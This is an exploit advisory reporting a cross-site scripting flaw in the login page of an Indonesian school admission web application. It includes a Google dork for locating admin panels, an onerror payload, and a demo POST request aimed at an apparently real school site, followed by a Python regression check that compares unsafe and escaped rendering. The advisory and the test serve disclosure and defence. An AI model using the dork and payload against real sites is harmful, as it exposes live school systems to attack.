Aplikasi PPDB Online - Cross-site-scripting (POST) Vulnerabilities

2021.01.30
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#############################################################
# Exploit Title: Aplikasi PPDB Online - Cross-site-scripting (POST) Vulnerabilities
# Google Dork: intitle:"Halaman Login" inurl:/panel_admin/log_in
# Date: 2021-1-30
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: gst-dev.net
# Software Version: ppdb_2021
# Software Link: http://gst-dev.net/#services
# Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux
#############################################################

[*] Information:
════════════════
GST - Dev is a website that provides instant school website creation services. Here, you can create your own website without requiring expertise in web design and programming. All you do is fill in the form provided, choose a design theme, then within 3 days, your school website will go straight online.

#############################################################

[*] Exploit:
════════════
{"username":"\"><img+src=x+onerror=prompt(1);>","password":"1","btnlogin":""}

#############################################################

[*] Demo:
═════════
http://ppdb.mtsn1ponorogo.sch.id/panel_admin/log_in

POST /panel_admin/log_in HTTP/1.1
Host: ppdb.mtsn1ponorogo.sch.id
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://ppdb.mtsn1ponorogo.sch.id
DNT: 1
Connection: keep-alive
Referer: http://ppdb.mtsn1ponorogo.sch.id/panel_admin/log_in
Cookie: ci_session=2a71ca59d274692e7dc3002694da6eeb6f63f351
Upgrade-Insecure-Requests: 1

#############################################################

[*] Contact:
════════════
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan.py
# Twitter: twitter.com/Gh05t666nero1
# E-mail: anoncentraI@protonmail.com
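
Added example, not part of the original advisory and not the vendor's code: a regression check for the username field that renders the submitted value into a login form and audits the resulting markup for injected elements. It assumes the page reflects the username into a double-quoted value attribute (the advisory does not show the server code); render_unsafe, render_safe, audit and submitted_username are hypothetical names.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Constructed request body: the advisory's field values, form-urlencoded.
BODY = urlencode({"username": '"><img src=x onerror=prompt(1);>',
                  "password": "1", "btnlogin": ""})

def render_unsafe(username):
    # Assumed vulnerable pattern: raw value placed inside a quoted attribute.
    return '<input type="text" name="username" value="%s">' % username

def render_safe(username):
    # quote=True also encodes " and ', so the value cannot close the attribute.
    return ('<input type="text" name="username" value="%s">'
            % escape(username, quote=True))

class TagAudit(HTMLParser):
    """Collects every start tag and any on* event-handler attribute names."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

def audit(html):
    """Return (start tags, event-handler attributes) found in the markup."""
    parser = TagAudit()
    parser.feed(html)
    parser.close()
    return parser.tags, parser.handlers

def submitted_username(body):
    # keep_blank_values so empty fields such as btnlogin are not dropped.
    return parse_qs(body, keep_blank_values=True)["username"][0]

if __name__ == "__main__":
    name = submitted_username(BODY)
    print("unsafe:", audit(render_unsafe(name)))
    print("safe:  ", audit(render_safe(name)))
```

The form should contain exactly one input element and no event-handler attributes, whatever the username is; any extra tag in the audit result means the value escaped its attribute.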


Copyright 2021, cxsecurity.com